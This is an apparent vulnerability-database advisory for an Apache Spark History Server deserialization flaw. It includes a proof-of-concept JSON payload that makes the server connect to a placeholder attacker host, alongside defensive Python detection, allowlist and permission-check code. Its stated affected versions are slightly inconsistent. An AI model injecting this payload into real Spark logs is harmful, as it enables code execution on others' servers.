CVE-2025-54920: CWE-502 Deserialization of Untrusted Data in Apache Software Foundation Apache Spark
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.
Summary
Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.
Details
The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.
The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.
Proof of Concept:
1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).
2. Inject the following JSON at the beginning of an event log file:
   { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } }
3. Start the Spark History Server with logs pointing to the modified directory.
4. The Spark History Server initiates a JDBC connection to the attacker's server, confirming the injection.
Impact
An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
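The proof of concept above relies on an "Event" value that names a class outside Spark. As a rough triage aid, the following Python sketch flags such lines in an uncompressed, line-delimited event log. The namespace rule is an assumption made for illustration (short "SparkListener..." names, or classes under org.apache.spark.), and the helper names `is_suspicious_event` and `scan_event_log` are hypothetical. It is not part of Spark and does not replace upgrading.

```python
import json

# Assumption: legitimate "Event" values are either short "SparkListener..."
# names or fully qualified class names under org.apache.spark.
TRUSTED_PREFIX = "org.apache.spark."


def is_suspicious_event(name):
    """Return True if an "Event" value falls outside the assumed namespaces."""
    if not isinstance(name, str):
        return True  # missing or non-string type id
    if name.startswith(TRUSTED_PREFIX):
        return False
    # Short names carry no package separator.
    return not (name.startswith("SparkListener") and "." not in name)


def scan_event_log(lines):
    """Yield (line_number, event_value) for each JSON object that looks suspicious."""
    for number, line in enumerate(lines, start=1):
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # not JSON; outside the scope of this check
        if isinstance(record, dict) and is_suspicious_event(record.get("Event")):
            yield number, record.get("Event")
```

A caller could pass an open file object, for example `list(scan_event_log(open(path, encoding="utf-8")))`, where `path` is a placeholder for an event log file. Compressed logs would need to be decompressed first.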
AI Analysis
Technical Summary
CVE-2025-54920 is a deserialization vulnerability in Apache Spark versions before 3.5.7 and 4.0.1 that affects the Spark History Server. The root cause is the use of Jackson's polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, which lets the JSON input itself name the Java class to instantiate. An attacker who can write to the Spark event logs directory can therefore craft payloads that instantiate classes the History Server never intended to load.
For example, a payload naming org.apache.hive.jdbc.HiveConnection makes the History Server open a JDBC connection to an attacker-controlled server. Because the attacker chooses which class is instantiated, this can lead to code execution on the host running the History Server. The payload is processed when the History Server starts up or loads the manipulated event logs. The attack requires write access to the event logs directory; beyond that, it needs no authentication to the History Server and no user interaction.
Polymorphic deserialization of untrusted data is a well-known risky pattern. Apache Spark 3.5.7 and 4.0.1 fix the issue. No exploitation in the wild is currently reported, but the vulnerability is publicly disclosed and should be treated as high risk wherever untrusted parties can write to the event logs directory.
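The general defense against this class of bug is to resolve type identifiers through an explicit allowlist instead of trusting a class name supplied in the data. The Python sketch below illustrates that idea by analogy only. It is not Jackson's API and not the change made in Spark, and the event classes and the `decode_event` helper are hypothetical.

```python
import json
from dataclasses import dataclass


@dataclass
class ApplicationStart:  # hypothetical event type
    app_name: str


@dataclass
class JobStart:  # hypothetical event type
    job_id: int


# Explicit allowlist: type id found in the data -> class the reader may build.
EVENT_TYPES = {
    "ApplicationStart": ApplicationStart,
    "JobStart": JobStart,
}


def decode_event(raw):
    """Decode one JSON event, refusing any type id that is not allowlisted."""
    record = json.loads(raw)
    if not isinstance(record, dict):
        raise ValueError("event must be a JSON object")
    type_id = record.pop("Event", None)
    cls = EVENT_TYPES.get(type_id) if isinstance(type_id, str) else None
    if cls is None:
        # The input never gets to pick a class outside the allowlist.
        raise ValueError(f"unexpected event type: {type_id!r}")
    return cls(**record)
```

With this shape, a payload naming org.apache.hive.jdbc.HiveConnection is rejected before any object is constructed, because the lookup table, not the input, decides which classes exist.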
Potential Impact
The impact of CVE-2025-54920 is severe for organizations using Apache Spark with event logging enabled and accessible log directories. An attacker with write permissions to the Spark event logs can execute arbitrary code on the server hosting the Spark History Server, potentially leading to full system compromise. This could result in unauthorized data access, data manipulation, lateral movement within the network, and disruption of analytics workflows. Since the History Server often runs with elevated privileges or access to sensitive data, the compromise could extend to critical infrastructure components. The vulnerability undermines the integrity and availability of Spark analytics environments and can be leveraged as a foothold for further attacks. Organizations relying on Spark for big data processing, especially in multi-tenant or cloud environments where log directories might be shared or insufficiently protected, face significant risk. The absence of authentication requirements for exploitation increases the threat level if attackers gain write access to logs through other means such as misconfigurations or insider threats.
Mitigation Recommendations
To mitigate CVE-2025-54920, organizations should immediately upgrade Apache Spark to versions 3.5.7 or 4.0.1 and above, where the deserialization flaw is fixed. Beyond upgrading, it is critical to enforce strict access controls on the Spark event logs directory to prevent unauthorized write access. Implement file system permissions and network segmentation to isolate the History Server and its logs from untrusted users or processes. Consider disabling or restricting event logging if not required, or redirect logs to secure, immutable storage. Employ runtime application self-protection (RASP) or monitoring tools to detect anomalous deserialization behavior or unexpected outbound JDBC connections from the History Server. Review and harden Jackson deserialization configurations to avoid polymorphic deserialization of untrusted data. Conduct regular audits of Spark deployment configurations and logs to detect suspicious modifications. Finally, incorporate this vulnerability into incident response plans and threat hunting activities to quickly identify exploitation attempts.
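As one way to start the access-control review described above, the following Python sketch lists entries under an event log directory that are writable by group or others. It assumes a local POSIX filesystem; logs kept on HDFS or object storage would need that system's own permission tooling. The function name `find_loosely_writable` is hypothetical, and whether group write access is acceptable depends on the deployment.

```python
import os
import stat


def find_loosely_writable(log_dir):
    """Return sorted paths under log_dir that group or others can write to."""
    findings = []
    for root, dirs, files in os.walk(log_dir):
        for name in dirs + files:
            path = os.path.join(root, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # symlink permission bits are not meaningful here
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(path)
    return sorted(findings)
```

A non-empty result is a prompt for review, not proof of compromise. For example, a shared log directory may be intentionally writable by several job owners, in which case the History Server should be upgraded before relying on permissions alone.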
Affected Countries
United States, Germany, India, China, United Kingdom, France, Canada, Australia, Japan, South Korea
Technical Details
- Data Version: 5.2
- Assigner Short Name: apache
- Date Reserved: 2025-08-01T01:09:45.224Z
- CVSS Version: null
- State: PUBLISHED
Threat ID: 69b527072f860ef943974709
Added to database: 3/14/2026, 9:14:47 AM
Last enriched: 3/14/2026, 9:29:06 AM
Last updated: 3/15/2026, 8:46:17 PM